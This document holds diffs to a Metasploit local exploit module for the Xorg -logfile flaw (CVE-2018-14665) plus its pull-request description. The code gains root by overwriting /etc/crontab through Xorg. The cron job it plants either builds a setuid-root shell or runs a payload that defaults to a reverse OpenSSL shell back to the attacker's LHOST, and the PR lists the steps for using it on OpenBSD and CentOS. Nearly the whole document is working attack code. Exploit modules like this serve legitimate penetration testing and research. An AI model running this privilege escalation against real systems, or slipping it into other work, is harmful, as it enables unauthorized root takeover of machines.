+           [ 'CVE', '2018-14665' ],
+           [ 'BID', '105741' ],
+           [ 'URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html' ],
+           [ 'URL', 'https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm' ]
+         ]
+    ))
+    register_options(
+      [
+        OptString.new('SCRIPT', [ true, 'Dir for crontab script', '/tmp/' ]),
+        OptString.new('PAYLOAD_LOC', [ true, 'SUID binary to create', '/usr/local/bin/shell' ]),
+        OptBool.new('BUILTIN', [ true, "Privesc in current session ",true ])
+      ])
+  end
+
+
+  def check
+    xorg_path = cmd_exec("which Xorg")
+    vprint_good "Xorg path found at #{xorg_path}"
+    if setuid? xorg_path
+      vprint_good "Xorg binary detected as SUID"
+      proc_list = []
+      proc_list = cmd_exec('ps ax')
+      if proc_list.include?("X")
+        vprint_warning("Xorg in process list, Can you stop it? ")
+        return CheckCode::Safe
+      else
+        vprint_good("Xorg does not appear running")
+        return CheckCode::Appears
+      end
+    else
+      return CheckCode::Safe
+    end
+  end
+
+
+  def exploit
+    check_status = check
+    unless check_status == CheckCode::Appears
+       fail_with Failure::NotVulnerable, "Target not vulnerable"
+    end
+    if is_root?
+      fail_with Failure::BadConfig, 'This session already has root privileges'
+    end
+
+    # Defines path to script that will chmod the payload
+    builtin_only = "#{datastore['BUILTIN']}"
+    payload_path = "#{datastore['PAYLOAD_LOC']}"
+    pscript = "#{datastore['SCRIPT']}.session-#{rand_text_alphanumeric rand(5..10)}"
+    payload_c = "#{pscript}.c"
+
+    # Universal stub for file crontab will run
+    cmd_exec "echo '#!/bin/sh' > #{pscript}"
+    cmd_exec "chmod +x #{pscript}"
+
+    # Upload for the text payloads
+    if builtin_only == 'false'
+      print_status 'Uploading your payload'
+      exp = payload.encoded.gsub('"', '\"').gsub('$', '\$')
+      cmd_exec "echo \"#{exp}\" >> #{pscript}"
+    else
+      print_good 'Attempting privesc within current session'
+      cmd_exec "echo cp /bin/sh #{payload_path} > #{pscript}"
+      cmd_exec "echo \'main(){setuid(0);setgid(0);system(\"/bin/sh\");}\' > #{payload_c}"
+      cmd_exec "echo gcc #{payload_c} -o #{payload_path} >> #{pscript}"
+      cmd_exec "echo chmod 4777 #{payload_path} >> #{pscript}"
+      register_file_for_cleanup payload_c
+      register_file_for_cleanup payload_path
+    end
+    register_file_for_cleanup pscript
+
+    # Exploit steps on crontab so backing it up
+    cmd_exec "cat /etc/crontab > #{pscript}.b"
+
+    # Actual exploit
+    print_status 'Trying /etc/crontab overwrite'
+    cmd_exec "cd /etc ; Xorg -fp '* * * * * root #{pscript}' -logfile crontab :1 & >/dev/null"
+    sleep 5
+    cmd_exec "pkill Xorg"
+    sleep 5
+    cron_check = cmd_exec "egrep #{pscript} /etc/crontab"
+    if cron_check.include? pscript
+      print_good '/etc/crontab overwrite successful'
+    else
+      fail_with Failure::NotVulnerable, "/etc/crontab not modified"
+    end
+
+    i = 0
+    while i < 12
+      print_status 'Waiting on cron to run'
+      sleep 10
+      i += 1
+      break if exists? payload_path
+      break if !exists? pscript      # will be cleaned up on successful exploit
+    end
+
+    #Time to become root and clean up a little
+    if builtin_only == 'true'
+      print_good 'Payload written..executing'
+      cmd_exec "#{payload_path}"
+      if is_root?
+        print_good 'Your session now has root privileges'
+        print_good 'Cleaning up and restoring crontab entries'
+        cmd_exec "cat #{pscript}.b > /etc/crontab"
+        cmd_exec "rm -f /etc/crontab.old"
+      end
+    else
+      sleep 5
+      print_status "This scripts session does not have root"
+      print_warning "You have some clean up to do in new session"
+      print_warning "cat #{pscript}.b > /etc/crontab ; rm -f #{pscript}.*"
+      print_warning "rm -f /etc/crontab.old"
+    end
+  end
+end

--- a/modules/exploits/openbsd/local/xorg_x11_suid_server.rb
+++ b/modules/exploits/openbsd/local/xorg_x11_suid_server.rb
@@ -46,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Local
         ],
       'Platform'       =>  %w(unix openbsd),
       'Arch'           =>    ARCH_CMD,
-      'SessionTypes'   =>    'shell',
+      'SessionTypes'   =>    [ 'meterpreter', 'shell' ],
       'Targets'        =>
         [
            ['OpenBSD', {
@@ -62,7 +62,7 @@ class MetasploitModule < Msf::Exploit::Local
     register_options(
       [
         OptString.new('PAYLOAD_LOC', [ true, 'SUID binary to create', '/usr/local/bin/shell' ]),
-        OptBool.new('BUILTIN', [ true, 'Privesc in current session', true ])
+        OptBool.new('INSHELL', [ true, 'Privesc in current shell session', true ])
       ])
      register_advanced_options(
       [
@@ -74,6 +74,7 @@ class MetasploitModule < Msf::Exploit::Local
 
 
   def check
+
     #suid program check
     xorg_path = cmd_exec("which Xorg")
     unless xorg_path.include?("Xorg")
@@ -90,46 +91,56 @@ class MetasploitModule < Msf::Exploit::Local
     #version check
     x_version = cmd_exec("Xorg -version")
     v = Gem::Version.new(x_version.scan(/\d.\d+.\d/).first)
-    unless v.between?(Gem::Version.new('1.19.0'), Gem::Version.new('1.20.3'))
-      fail_with Failure::NotVulnerable, "Xorg version #{v} not supported"
+    unless v.between?(Gem::Version.new('1.19.0'), Gem::Version.new('1.20.2'))
+      vprint_error "Xorg version #{v} not supported"
+      return CheckCode::Safe
     end
     vprint_good "Xorg version #{v} is vulnerable"
 
     #process check
-    proc_list = []
     proc_list = cmd_exec("ps ax")
-    if proc_list.include?('X')
-      vprint_warning('Xorg in process list. Can you stop it?')
-      return CheckCode::Safe
+    if proc_list.include?('/X ')
+      vprint_warning('Xorg in process list')
+      return CheckCode::Appears
     else
       vprint_good('Xorg does not appear running')
-      return CheckCode::Detected
+      return CheckCode::Vulnerable
     end
   end
 
+  def clean_on_success()
+    # will be called on session and have to drop filedropper
+    # still 
+    end
 
   def exploit
     check_status = check
-    unless check_status == CheckCode::Detected
+    unless check_status == CheckCode::Vulnerable
        fail_with Failure::NotVulnerable, 'Target not vulnerable'
     end
+
     if is_root?
       fail_with Failure::BadConfig, 'This session already has root privileges'
     end
 
     xdisplay = datastore['Xdisplay']
-    builtin_only = datastore['BUILTIN']
+    in_shell = datastore['INSHELL']
     payload_path = datastore['PAYLOAD_LOC']
     pscript = "#{datastore['WritableDir']}/.session-#{rand_text_alphanumeric 5..10}"
     payload_c = "#{pscript}.c"
 
     #Making file crontab will run
     cron_script = ''
-    if builtin_only == false
+    if in_shell == false
       print_status 'Uploading your payload'
-      cron_script << payload.encoded.gsub('"', '\"').gsub('$', '\$')
-      write_file(pscript,cron_script)
-      vprint_status cron_script
+      if session.type == 'shell'
+        cron_script << payload.encoded.gsub('"', '\"').gsub('$', '\$')
+        write_file(pscript,cron_script)
+        vprint_status cron_script
+      else
+        write_file(pscript, payload)
+        vprint_status 'Uploaded Meterpreter payload'
+      end
     else
       print_good 'Attempting privesc within current session'
       cron_script << "cp /bin/sh #{payload_path}\n"
@@ -169,7 +180,7 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     #Time to become root and clean up a little
-    if builtin_only == true
+    if in_shell == true
       print_good 'Payload written..executing'
       cmd_exec payload_path
       if is_root?
@@ -179,7 +190,6 @@ class MetasploitModule < Msf::Exploit::Local
         rm_f "/etc/crontab.old"
       end
     else
-      Rex.sleep 2
       #<on_next_session for this?
       print_status "This scripts' session does not have root"
       print_warning 'You have some clean-up to do in new session'

--- a/modules/exploits/openbsd/local/xorg_x11_suid_server.rb
+++ b/modules/exploits/openbsd/local/xorg_x11_suid_server.rb
@@ -4,9 +4,8 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Local
-  Rank = ExcellentRanking
+  Rank = GoodRanking
 
-  include Msf::Post::Common
   include Msf::Post::File
   include Msf::Exploit::FileDropper
   include Msf::Post::Linux::Priv
@@ -19,16 +18,15 @@ class MetasploitModule < Msf::Exploit::Local
         versions prior to 1.20.3.
 
         A permission check flaw exists for -modulepath and -logfile options when
-        starting Xorg prior to 1.20.3.  This allows unprivileged users with the
-        ability to log in to the system via console to escalate their privileges
-        and run arbitrary code under root privileges (CVE-2018-14665).
+        starting Xorg versions 1.19.0 < 1.20.3.  This allows unprivileged users
+        that start the server the ability to elevate privileges and run
+        arbitrary code under root privileges.
 
         This module writes a cron job using the Xorg -logfile option. The job
-        will run a small script to launch an executable. It has been tested with
+        will run a small script to launch a payload. It has been tested with
         OpenBSD 6.3,6.4 and CentOS 7.  Xorg must have SUID permissions. Success
         on CentOS depends on the session having console for starting Xorg
         along with selinux settings, may work but is currently not supported.
-
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -37,109 +35,113 @@ class MetasploitModule < Msf::Exploit::Local
           'Raptor - 0xdea',  # Modified exploit for cron
           'Aaron Ringo'      # Metasploit module
         ],
-
       'DisclosureDate' => 'Oct 25 2018',
-      'Platform'       =>  %w(linux unix openbsd),
-      'Arch'           =>    ARCH_CMD,
-      'SessionTypes'   =>    'shell', #Shell is needed to start Xorg in Linux
-      'Targets'        =>
-         [
-           ['OpenBSD', {
-            'Platform' => 'unix',
-            'Arch' => [ ARCH_CMD ] } ]
-          ],
-      'DefaultOptions' =>
-         {
-             'Target'  => '0',
-             'PAYLOAD' => 'cmd/unix/reverse_openssl'
-         },
       'References'     =>
-         [
+        [
            [ 'CVE', '2018-14665' ],
            [ 'BID', '105741' ],
            [ 'URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html' ],
            [ 'URL', 'https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm' ]
-         ]
-    ))
+        ],
+      'Platform'       =>  %w(linux unix openbsd),
+      'Arch'           =>    ARCH_CMD,
+      'SessionTypes'   =>    'shell',
+      'Targets'        =>
+        [
+           ['OpenBSD', {
+            'Platform' => 'unix',
+            'Arch' => [ ARCH_CMD ] } ]
+        ],
+      'DefaultOptions' =>
+        {
+          'PAYLOAD' => 'cmd/unix/reverse_openssl'
+        },
+
+      'DefaultTarget'  => 0))
     register_options(
       [
         OptString.new('SCRIPT', [ true, 'Dir for crontab script', '/tmp/' ]),
         OptString.new('PAYLOAD_LOC', [ true, 'SUID binary to create', '/usr/local/bin/shell' ]),
-        OptBool.new('BUILTIN', [ true, "Privesc in current session ",true ])
+        OptBool.new('BUILTIN', [ true, 'Privesc in current session', true ])
       ])
   end
 
 
   def check
     xorg_path = cmd_exec("which Xorg")
-    vprint_good "Xorg path found at #{xorg_path}"
-    if setuid? xorg_path
-      vprint_good "Xorg binary detected as SUID"
+    vprint_good 'Xorg path found at #{xorg_path}'
+
+    unless setuid? xorg_path
+      vprint_error 'Xorg binary #{xorg_path} is not SUID'
+      return CheckCode::Safe
+    end
+      vprint_good 'Xorg binary #{xorg_path} is SUID'
+
       proc_list = []
-      proc_list = cmd_exec('ps ax')
-      if proc_list.include?("X")
-        vprint_warning("Xorg in process list, Can you stop it? ")
+      proc_list = cmd_exec("ps ax")
+      if proc_list.include?('X')
+        vprint_warning('Xorg in process list. Can you stop it?')
         return CheckCode::Safe
       else
-        vprint_good("Xorg does not appear running")
-        return CheckCode::Appears
-      end
-    else
-      return CheckCode::Safe
+        vprint_good('Xorg does not appear running')
+        return CheckCode::Detected
     end
   end
 
 
   def exploit
     check_status = check
-    unless check_status == CheckCode::Appears
-       fail_with Failure::NotVulnerable, "Target not vulnerable"
+    unless check_status == CheckCode::Detected
+       fail_with Failure::NotVulnerable, 'Target not vulnerable'
     end
     if is_root?
       fail_with Failure::BadConfig, 'This session already has root privileges'
     end
 
     # Defines path to script that will chmod the payload
-    builtin_only = "#{datastore['BUILTIN']}"
-    payload_path = "#{datastore['PAYLOAD_LOC']}"
+    builtin_only = datastore['BUILTIN']
+    payload_path = datastore['PAYLOAD_LOC']
     pscript = "#{datastore['SCRIPT']}.session-#{rand_text_alphanumeric 5..10}"
     payload_c = "#{pscript}.c"
 
-    # Universal stub for file crontab will run
-    cmd_exec "echo '#!/bin/sh' > #{pscript}"
-    cmd_exec "chmod +x #{pscript}"
-
+    #File crontab will run
+    cron_script = ''
     # Upload for the text payloads
-    if builtin_only == 'false'
+    if builtin_only == false
       print_status 'Uploading your payload'
-      exp = payload.encoded.gsub('"', '\"').gsub('$', '\$')
-      cmd_exec "echo \"#{exp}\" >> #{pscript}"
+      cron_script << payload.encoded.gsub('"', '\"').gsub('$', '\$')
+      write_file(pscript,cron_script)
+      vprint_status cron_script
     else
       print_good 'Attempting privesc within current session'
-      cmd_exec "echo cp /bin/sh #{payload_path} > #{pscript}"
-      cmd_exec "echo \'main(){setuid(0);setgid(0);system(\"/bin/sh\");}\' > #{payload_c}"
-      cmd_exec "echo gcc #{payload_c} -o #{payload_path} >> #{pscript}"
-      cmd_exec "echo chmod 4777 #{payload_path} >> #{pscript}"
+      cron_script << "cp /bin/sh #{payload_path}\n"
+      cron_script << "gcc #{payload_c} -o #{payload_path}\n"
+      cron_script << "chmod 4777 #{payload_path}\n"
+      suid_c = 'main(){setuid(0);setgid(0);system("/bin/sh");}'
+      write_file(pscript,cron_script)
+      vprint_status cron_script
+      write_file(payload_c,suid_c)
+      vprint_status suid_c
       register_file_for_cleanup payload_c
       register_file_for_cleanup payload_path
     end
     register_file_for_cleanup pscript
+    chmod pscript
 
     # Exploit steps on crontab so backing it up
     cmd_exec "cat /etc/crontab > #{pscript}.b"
 
-    # Actual exploit
+    # Actual exploit with cron overwrite
     print_status 'Trying /etc/crontab overwrite'
     cmd_exec "cd /etc ; Xorg -fp '* * * * * root #{pscript}' -logfile crontab :1 & >/dev/null"
-    sleep 5
+    Rex.sleep 5
     cmd_exec "pkill Xorg"
-    sleep 5
+    Rex.sleep 5
     cron_check = cmd_exec "egrep #{pscript} /etc/crontab"
-    if cron_check.include? pscript
-      print_good '/etc/crontab overwrite successful'
-    else
-      fail_with Failure::NotVulnerable, "/etc/crontab not modified"
+    unless cron_check.include? pscript
+      fail_with Failure::NotVulnerable, '/etc/crontab not modified'
     end
+    print_good '/etc/crontab overwrite successful'
 
     i = 0
     while i < 12
@@ -151,21 +153,21 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     #Time to become root and clean up a little
-    if builtin_only == 'true'
+    if builtin_only == true
       print_good 'Payload written..executing'
-      cmd_exec "#{payload_path}"
+      cmd_exec payload_path
       if is_root?
         print_good 'Your session now has root privileges'
         print_good 'Cleaning up and restoring crontab entries'
         cmd_exec "cat #{pscript}.b > /etc/crontab"
-        cmd_exec "rm -f /etc/crontab.old"
+        rm_f "/etc/crontab.old"
       end
     else
-      sleep 5
-      print_status "This scripts session does not have root"
-      print_warning "You have some clean up to do in new session"
-      print_warning "cat #{pscript}.b > /etc/crontab ; rm -f #{pscript}.*"
-      print_warning "rm -f /etc/crontab.old"
+      Rex.sleep 2
+      print_status "This scripts' session does not have root"
+      print_warning 'You have some clean-up to do in new session'
+      print_warning 'cat #{pscript}.b > /etc/crontab ; rm -f #{pscript}.*'
+      print_warning 'rm -f /etc/crontab.old'
     end
   end
 end


### PR DESCRIPTION
Module adds the ability to privesc by overwriting crontab. It was tested on OpenBSD 6.3 and 6.4 along with CentOS 7. 

Steps needed to make sure this thing works
Must have a session on an OpenBSD or Linux box with a SUID Xorg.  If using a Centos box the user the session is running under must have console lock.  The script checks for this by default on Linux but you may turn it off. 

With OpenBSD most cmd shells requirements are not met on a default install.
I found openssl to be a good default shell plus it is encrypted.

To privesc OpenBSD
- [x]  use exploit/multi/local/xorg_x11_suid_server
- [x]  set session 1
- [x] set LHOST x.x.x.x
OpenBSD
![openbsd](https://user-images.githubusercontent.com/3400203/48353045-088e8780-e654-11e8-8065-90558c0e47af.png)

To privesc Linux (Have console lock CentOs)   
- [x]  use exploit/multi/local/xorg_x11_suid_server
- [x]  set session 1
- [x] set LHOST x.x.x.x
Below example has verbose set to True 
![linux](https://user-images.githubusercontent.com/3400203/48353542-4cce5780-e655-11e8-89ad-8f30bb834e8a.png)
